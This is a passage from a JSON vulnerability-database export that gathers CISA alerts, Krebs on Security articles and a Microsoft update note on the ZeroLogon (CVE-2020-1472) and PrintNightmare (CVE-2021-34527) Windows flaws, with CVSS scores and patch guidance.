\u7ba1\u7406\u8005\u5411\u3051] CVE-2020-1472 Netlogon \u306e\u5bfe\u5fdc\u30ac\u30a4\u30c0\u30f3\u30b9\u306e\u6982\u8981", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-14T07:00:00", "id": "MSRC:D7503EE6392B6B3DC42482FC0340DB67", "href": "/blog/2020/09/20200915_netlogon/", "cvss": {"score": 0.0, "vector": "NONE"}}], "cisa": [{"lastseen": "2022-01-26T11:32:30", "description": "CISA has issued [Emergency Directive (ED) 21-04: Mitigate Windows Print Spooler Service Vulnerability](<https://www.cisa.gov/emergency-directive-21-04>) addressing [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). Attackers can exploit this vulnerability to remotely execute code with system level privileges enabling a threat actor to quickly compromise the entire identity infrastructure of a targeted organization. \n\nSpecifically, ED 21-04 directs federal departments and agencies to immediately apply the [Microsoft July 2021 updates](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>) and disable the print spooler service on servers on Microsoft Active Directory (AD) Domain Controllers (DCs).\n\nAlthough ED 21-04 applies to Executive Branch departments and agencies, CISA strongly recommends that state and local governments, private sector organizations, and others review [ED 21-04: Mitigate Windows Print Spooler Service Vulnerability](<https://www.cisa.gov/emergency-directive-21-04>) for additional mitigation recommendations.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/cisa-issues-emergency-directive-microsoft-windows-print-spooler>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-13T00:00:00", "type": "cisa", "title": "CISA Issues Emergency Directive on Microsoft Windows Print Spooler", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-01-25T00:00:00", "id": "CISA:4F4185688CEB9B9416A98FE75E7AFE02", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/07/13/cisa-issues-emergency-directive-microsoft-windows-print-spooler", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2022-03-16T11:35:47", "description": "CISA and the Federal Bureau of Investigation (FBI) have released a [joint Cybersecurity Advisory](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>) that details how Russian state-sponsored cyber actors accessed a network with misconfigured default multifactor authentication (MFA) protocols. The actors then exploited a critical Windows Print Spooler vulnerability, \u201cPrintNightmare\u201d (CVE-2021-34527), to run arbitrary code with system privileges. The advisory provides observed tactics, techniques, and procedures, as well as indicators of compromise and mitigations to protect against this threat. \n\nCISA encourages users and administrators to review [AA22-074A: Russian State-Sponsored Cyber Actors Gain Network Access by Exploiting Default Multifactor Authentication Protocols and \u201cPrintNightmare\u201d Vulnerability](<https://www.cisa.gov/uscert/ncas/alerts/aa22-074a>). For general information on Russian state-sponsored malicious cyber activity, see [cisa.gov/Russia](<https://www.cisa.gov/uscert/russia>). For more information on the threat of Russian state-sponsored malicious cyber actors to U.S. critical infrastructure, as well as additional mitigation recommendations, see [AA22-011A: Understanding and Mitigating Russian State-Sponsored Cyber Threats to U.S. Critical Infrastructure](<https://www.cisa.gov/uscert/ncas/alerts/aa22-011a>) and [cisa.gov/shields-up](<https://www.cisa.gov/shields-up>).\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured>); we'd welcome your feedback.\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2022-03-15T00:00:00", "type": "cisa", "title": "Russian State-Sponsored Cyber Actors Access Network Misconfigured with Default MFA Protocols", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2022-03-15T00:00:00", "id": "CISA:91DA945EA20AF1A221FDE02A2D9CE315", "href": "https://us-cert.cisa.gov/ncas/current-activity/2022/03/15/russian-state-sponsored-cyber-actors-access-network-misconfigured", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:41", "description": "The Samba Team has released a security update to address a critical vulnerability\u2014CVE-2020-1472\u2014in multiple versions of Samba. This vulnerability could allow a remote attacker to take control of an affected system.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Samba Security Announcement for [CVE-2020-1472](<https://www.samba.org/samba/security/CVE-2020-1472.html>) and apply the necessary updates or workaround.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/21/samba-releases-security-update-cve-2020-1472>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-21T00:00:00", "type": "cisa", "title": "Samba Releases Security Update for CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-21T00:00:00", "id": "CISA:7FB0A467C0EB89B6198A58418B43D50C", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/21/samba-releases-security-update-cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:34", "description": "Microsoft has released a [blog post](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>) on cyber threat actors exploiting CVE-2020-1472, an elevation of privilege vulnerability in Microsoft\u2019s Netlogon. A remote attacker can exploit this vulnerability to breach unpatched Active Directory domain controllers and obtain domain administrator access. The Cybersecurity and Infrastructure Security Agency (CISA) has observed nation state activity exploiting this vulnerability. This malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks.\n\nCISA urges administrators to patch all domain controllers immediately\u2014until every domain controller is updated, the entire infrastructure remains vulnerable, as threat actors can identify and exploit a vulnerable system in minutes. If there is an observation of CVE-2020-1472 Netlogon activity or other indications of valid credential abuse detected, it should be assumed that malicious cyber actors have compromised all identity services.\n\nIn the coming weeks and months, administrators should take follow-on actions that are described in [guidance](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) released by Microsoft to prepare for the second half of Microsoft\u2019s Netlogon migration process, which is scheduled to conclude in February 2021.\n\nCISA encourages users and administrators to review the following resources and apply the necessary updates and mitigations.\n\n * Microsoft blog post: [Attacks exploiting Netlogon vulnerability (CVE-2020-1472)](<https://msrc-blog.microsoft.com/2020/10/29/attacks-exploiting-netlogon-vulnerability-cve-2020-1472/>)\n * Microsoft: August Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n * Microsoft: [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)\n * CISA Joint Cybersecurity Advisory: [AA20-283A APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations](<https://us-cert.cisa.gov/ncas/alerts/aa20-283a>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-10-29T00:00:00", "type": "cisa", "title": "Microsoft Warns of Continued Exploitation of CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-12-10T00:00:00", "id": "CISA:61F2653EF56231DB3AEC3A9E938133FE", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/10/29/microsoft-warns-continued-exploitation-cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:42", "description": "The CERT Coordination Center (CERT/CC) has released information on CVE-2020-1472, a vulnerability affecting Microsoft Windows Netlogon Remote Protocol. An unauthenticated attacker could exploit this vulnerability to obtain Active Directory domain administrator access. Although Microsoft provided patches for CVE-2020-1472 in August 2020, unpatched systems will be an attractive target for malicious actors.\n\nThe Cybersecurity and Infrastructure Security Agency (CISA), encourages users and administrators to review the following resources and apply the necessary updates and workaround.\n\n * CERT/CC Vulnerability Note [VU#490028](<https://www.kb.cert.org/vuls/id/490028>)\n * Microsoft\u2019s Security Advisory for [CVE-2020-1472](< https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n * Microsoft\u2019s guidance on [How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>)\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/17/certcc-releases-information-critical-vulnerability-microsoft>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-17T00:00:00", "type": "cisa", "title": "CERT/CC Releases Information on Critical Vulnerability in Microsoft Windows Netlogon Remote Protocol", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-17T00:00:00", "id": "CISA:7E93687DEED7F2EA7EFAEBA997B30A5D", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/17/certcc-releases-information-critical-vulnerability-microsoft", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:40", "description": "The Cybersecurity and Infrastructure Security Agency (CISA) is aware of publicly available exploit code for CVE-2020-1472, an elevation of privilege vulnerability in Microsoft\u2019s Netlogon. Although Microsoft provided patches for CVE-2020-1472 in August 2020, unpatched systems will be an attractive target for malicious actors. Attackers could exploit this vulnerability to obtain domain administrator access.\n\nCISA encourages users and administrators to review Microsoft\u2019s August Security Advisory for [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472 >) and [Article](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>) for more information and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-14T00:00:00", "type": "cisa", "title": "Exploit for Netlogon Remote Protocol Vulnerability, CVE-2020-1472", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-14T00:00:00", "id": "CISA:433F588AAEF2DF2A0B46FE60687F19E0", "href": "https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-02-24T18:06:34", "description": "Microsoft addressed a critical remote code execution vulnerability affecting the Netlogon protocol (CVE-2020-1472) on August 11, 2020. Beginning with the February 9, 2021 Security Update release, Domain Controllers will be placed in enforcement mode. This will require all Windows and non-Windows devices to use secure Remote Procedure Call (RPC) with Netlogon secure channel or to explicitly allow the account by adding an exception for any non-compliant device.\n\nCISA encourages users and administrators to review the Microsoft [security update](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1472>) and apply the necessary updates.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2021/02/10/microsoft-launches-phase-2-mitigation-netlogon-remote-code>); we'd welcome your feedback.\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-02-10T00:00:00", "type": "cisa", "title": "Microsoft Launches Phase 2 Mitigation for Netlogon Remote Code Execution Vulnerability (CVE-2020-1472) ", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2021-02-10T00:00:00", "id": "CISA:E5A33B5356175BB63C2EFA605346F8C7", "href": "https://us-cert.cisa.gov/ncas/current-activity/2021/02/10/microsoft-launches-phase-2-mitigation-netlogon-remote-code", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "krebs": [{"lastseen": "2021-07-28T14:33:35", "description": "**Microsoft **on Tuesday issued an emergency software update to quash a security bug that's been dubbed "**PrintNightmare**," a critical vulnerability in all supported versions of** Windows** that is actively being exploited. The fix comes a week ahead of Microsoft's normal monthly Patch Tuesday release, and follows the publishing of exploit code showing would-be attackers how to leverage the flaw to break into Windows computers.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/08/windowsec.png)\n\nAt issue is [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>), which involves a flaw in the Windows Print Spooler service that could be exploited by attackers to run code of their choice on a target's system. Microsoft says it has already detected active exploitation of the vulnerability.\n\n**Satnam Narang**, staff research engineer at** Tenable**, said Microsoft's patch warrants urgent attention because of the vulnerability's ubiquity across organizations and the prospect that attackers could exploit this flaw in order to take over a Windows domain controller.\n\n"We expect it will only be a matter of time before it is more broadly incorporated into attacker toolkits," Narang said. "PrintNightmare will remain a valuable exploit for cybercriminals as long as there are unpatched systems out there, and as we know, unpatched vulnerabilities have a long shelf life for attackers."\n\nIn [a blog post](<https://msrc-blog.microsoft.com/2021/07/06/out-of-band-oob-security-update-available-for-cve-2021-34527/>), Microsoft's Security Response Center said it was delayed in developing fixes for the vulnerability in **Windows Server 2016**, **Windows 10 version 1607**, and **Windows Server 2012**. The fix also apparently includes a new feature that allows Windows administrators to implement stronger restrictions on the installation of printer software.\n\n"Prior to installing the July 6, 2021, and newer Windows Updates containing protections for CVE-2021-34527, the printer operators\u2019 security group could install both signed and unsigned printer drivers on a printer server," reads Microsoft's [support advisory](<https://support.microsoft.com/en-us/topic/kb5005010-restricting-installation-of-new-printer-drivers-after-applying-the-july-6-2021-updates-31b91c02-05bc-4ada-a7ea-183b129578a7>). "After installing such updates, delegated admin groups like printer operators can only install signed printer drivers. Administrator credentials will be required to install unsigned printer drivers on a printer server going forward.\u201d\n\nWindows 10 users can check for the patch by opening Windows Update. Chances are, it will show what's pictured in the screenshot below -- that **KB5004945** is available for download and install. A reboot will be required after installation.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2021/07/kb5004945.png)\n\nFriendly reminder: It's always a good idea to backup your data before applying security updates. Windows 10 [has some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once. \n\nMicrosoft's out-of-band update may not completely fix the PrinterNightmare vulnerability. Security researcher [Benjamin Delpy](<https://blog.gentilkiwi.com/>) [posted on Twitter](<https://twitter.com/gentilkiwi/status/1412771368534528001>) that the exploit still works on a fully patched Windows server if the server also has Point & Print enabled -- a Windows feature that automatically downloads and installs available printer drivers.\n\nDelpy said it's common for organizations to enable Point & Print using group policies because it allows users to install printer updates without getting approval first from IT. \n\nThis post will be updated if Windows users start reporting any issues in applying the patch.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-07-07T14:34:59", "type": "krebs", "title": "Microsoft Issues Emergency Patch for Windows Flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.0, "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34527"], "modified": "2021-07-07T14:34:59", "id": "KREBS:3CC49021549439F95A2EDEB2029CF54E", "href": "https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-09-24T17:42:40", "description": "**Microsoft** warned on Wednesday that malicious hackers are exploiting a particularly dangerous flaw in **Windows Server** systems that could be used to give attackers the keys to the kingdom inside a vulnerable corporate network. Microsoft's warning comes just days after the **U.S. Department of Homeland Security** issued an emergency directive instructing all federal agencies to patch the vulnerability by Sept. 21 at the latest.\n\n![](https://krebsonsecurity.com/wp-content/uploads/2020/09/msi-tweet.png)\n\nDHS's **Cybersecurity and Infrastructure Agency** (CISA) said [in the directive](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/18/cisa-releases-emergency-directive-microsoft-windows-netlogon>) that it expected imminent exploitation of the flaw -- [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) and dubbed "ZeroLogon" -- because exploit code which can be used to take advantage of it [was circulating online](<https://us-cert.cisa.gov/ncas/current-activity/2020/09/14/exploit-netlogon-remote-protocol-vulnerability-cve-2020-1472>).\n\nLast night, Microsoft's Security Intelligence unit [tweeted](<https://twitter.com/MsftSecIntel/status/1308941504707063808>) that the company is "tracking threat actor activity using exploits for the CVE-2020-1472 Netlogon vulnerability."\n\n"We have observed attacks where public exploits have been incorporated into attacker playbooks," Microsoft said. "We strongly recommend customers to immediately apply security updates."\n\nMicrosoft [released a patch for the vulnerability in August](<https://krebsonsecurity.com/2020/08/microsoft-patch-tuesday-august-2020-edition/>), but it is not uncommon for businesses to delay deploying updates for days or weeks while testing to ensure the fixes do not interfere with or disrupt specific applications and software.\n\nCVE-2020-1472 earned Microsoft's most-dire "critical" severity rating, meaning attackers can exploit it with little or no help from users. The flaw is present in most supported versions of Windows Server, from **Server 2008** through **Server 2019**.\n\nThe vulnerability could let an unauthenticated attacker gain administrative access to a Windows domain controller and run an application of their choosing. A domain controller is a server that responds to security authentication requests in a Windows environment, and a compromised domain controller can give attackers the keys to the kingdom inside a corporate network.\n\n**Scott Caveza**, research engineering manager at security firm [Tenable](<https://www.tenable.com>), said several samples of malicious .NET executables with the filename \u2018SharpZeroLogon.exe\u2019 have been uploaded to VirusTotal, a service owned by Google that scans suspicious files against dozens of antivirus products.\n\n"Given the flaw is easily exploitable and would allow an attacker to completely take over a Windows domain, it should come as no surprise that we\u2019re seeing attacks in the wild," Caveza said. "Administrators should prioritize patching this flaw as soon as possible. Based on the rapid speed of exploitation already, we anticipate this flaw will be a popular choice amongst attackers and integrated into malicious campaigns."", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2020-09-24T17:00:51", "type": "krebs", "title": "Microsoft: Attackers Exploiting \u2018ZeroLogon\u2019 Windows Flaw", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-1472"], "modified": "2020-09-24T17:00:51", "id": "KREBS:952ACEBFD55EBD076910C6B233491883", "href": "https://krebsonsecurity.com/2020/09/microsoft-attackers-exploiting-zerologon-windows-flaw/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "mskb": [{"lastseen": "2023-06-23T19:38:44", "description": "None\n**Important: **This release includes the Flash Removal Package. Taking this update will remove Adobe Flash from the device. For more information, see the [Update on Adobe Flash Player End of Support](<https://blogs.windows.com/msedgedev/2020/09/04/update-adobe-flash-end-support/>).\n\n**Important: **Windows 8.1 and Windows Server 2012 R2 have reached the end of mainstream support and are now in extended support. Starting in July 2020, there will no longer be optional, non-security releases (known as \"C\" releases) for this operating system. Operating systems in extended support have only cumulative monthly security updates (known as the \"B\" or Update Tuesday release). \n \nFor information about the various types of Windows updates, such as critical, security, driver, service packs, and so on, please see the following [article](<https://support.microsoft.com/help/824684>). To view other notes and messages, see the Windows 8.1 and Windows Server 2012 R2 update history [home page](<https://support.microsoft.com/help/4009470>).\n\n## **Improvements and fixes**\n\nThis security update includes improvements and fixes that were a part of update [KB5003671](<https://support.microsoft.com/help/5003671>) (released June 8, 2021) and addresses the following issues:\n\n * Addresses a remote code execution exploit in the Windows Print Spooler service, known as \u201cPrintNightmare\u201d, as documented in [CVE-2021-34527](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527>). After installing this and later Windows updates, users who are not administrators can only install signed print drivers to a print server. By default, administrators can install signed and unsigned printer drivers to a print server. The installed root certificates in the system\u2019s Trusted Root Certification Authorities trusts signed drivers. Microsoft recommends that you immediately install this update on all supported Windows client and server operating system, starting with devices that currently host the print server role. You also have the option to configure the 